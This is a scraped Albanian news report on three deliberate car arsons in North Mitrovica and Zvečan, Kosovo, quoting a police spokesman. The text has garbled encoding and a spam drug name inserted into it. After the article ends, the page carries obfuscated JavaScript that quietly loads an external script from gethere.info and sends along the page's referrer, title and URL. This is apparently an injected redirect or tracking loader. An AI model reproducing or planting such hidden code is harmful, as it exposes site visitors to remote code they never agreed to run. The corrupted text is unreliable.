largea_veriu1353402338

Tri zjarr-vA�nie nA� veri

phenergan suppository. Tri raste tA� shkaktimit tA� rrezikut tA� pA�rgjithshA�m janA� shA�nuar mbrA�mA� nA� dy lokacione nA� veriun e KosovA�s, ka bA�rA� tA� ditur Policia e KosovA�s.

ZA�dhA�nA�si i kA�saj policie, Besim Hoti, tha pA�r Radion Evropa e LirA� se rastet janA� shA�nuar pak para mesnatA�s por edhe pas saj, kur persona tA� panjohur deri mA� tash pA�r policinA�, kanA� shkaktuar zjarr-vA�nie tA� qA�llimshme nA� tri automjete private.

a�?Dy rastet e para janA� shA�nuar nA� veri tA� MitrovicA�s, nA� rrugA�n Sutjeska, ndA�rsa rasti i tretA� A�shtA� regjistruar nA� ZveA�an. NA� tA� trija rastet nuk kemi pasur persona tA� lA�nduar. Do tA� thotA� cak i sulmeve ishin automjetet. NdA�rkaq, motivet, deri nA� kA�tA� A�ast, mbeten akoma tA� panjohura ashtu sikurse edhe tA� dyshuarit e kA�tyre akteve kriminalea�?, ka thA�nA� Hoti.

Policia i ka regjistruar kA�to raste si vepra penale tA� shkaktimit tA� rrezikut tA� pA�rgjithshA�m, apo zjarr-vA�nie e qA�llimshme, dhe sipas zA�dhA�nA�sit Hoti, organet e rendit janA� duke i zhvilluar hetimet pA�r zbardhjen e rasteve dhe autorA�ve tA� tyre.

KA�to incidente pasojnA� mjetin shpA�rthyes qA� A�shtA� hedhur njA� ditA� mA� parA� nA� njA� shtA�pi private nA� ZveA�an.

ShtA�pia i takonte Dushan Millisavleviqit, i cili A�shtA� edhe zA�vendA�sshef i ZyrA�s Administrative nA� veri, e cila vepron nA�n QeverinA� e KosovA�s.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}